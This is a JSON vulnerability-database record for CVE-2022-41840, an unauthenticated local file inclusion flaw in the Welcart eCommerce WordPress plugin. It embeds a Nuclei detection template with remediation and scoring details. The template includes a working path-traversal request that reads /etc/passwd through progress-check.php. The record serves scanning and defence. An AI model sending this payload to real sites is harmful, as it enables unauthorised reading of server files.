{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2022-41840/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2022-41840/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2022-41840/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2022-41840/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2022-41840/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2022-41840"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2022-41840"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2022/CVE-2022-41840.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2022-41840\n\ninfo:\n  name: Welcart eCommerce <=2.7.7 - Local File Inclusion\n  author: theamanrawat\n  severity: critical\n  description: |\n    Welcart eCommerce 2.7.7 and before are vulnerable to unauthenticated local file inclusion.\n  impact: |\n    The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.\n  remediation: |\n    Upgrade Welcart eCommerce plugin to the latest version (>=2.7.8) or apply the provided patch to fix the LFI vulnerability.\n  reference:\n    - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability\n    - https://wordpress.org/plugins/usc-e-shop/\n    - https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-7-7-unauth-directory-traversal-vulnerability?_s_id=cve\n    - https://nvd.nist.gov/vuln/detail/CVE-2022-41840\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2022-41840\n    cwe-id: CWE-22\n    epss-score: 0.05521\n    epss-percentile: 0.92507\n    cpe: cpe:2.3:a:collne:welcart_e-commerce:*:*:*:*:*:wordpress:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: collne\n    product: welcart_e-commerce\n    framework: wordpress\n  tags: cve2022,cve,wp-plugin,wordpress,wp,lfi,unauth,usc-e-shop,collne,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd\"\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: header\n        words:\n          - \"application/json\"\n\n      - type: regex\n        part: body\n        regex:\n          - \"root:.*:0:0:\"\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100e4e6c80cb794ba3bfe18348786fd5e8a4ea2f74e80097fadd68f0c834307014e022100face6d73fa280776ad14c0e17c04ef40c2a14ff9cf95551f5a0028da4f5f56f6:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2022-41840"
}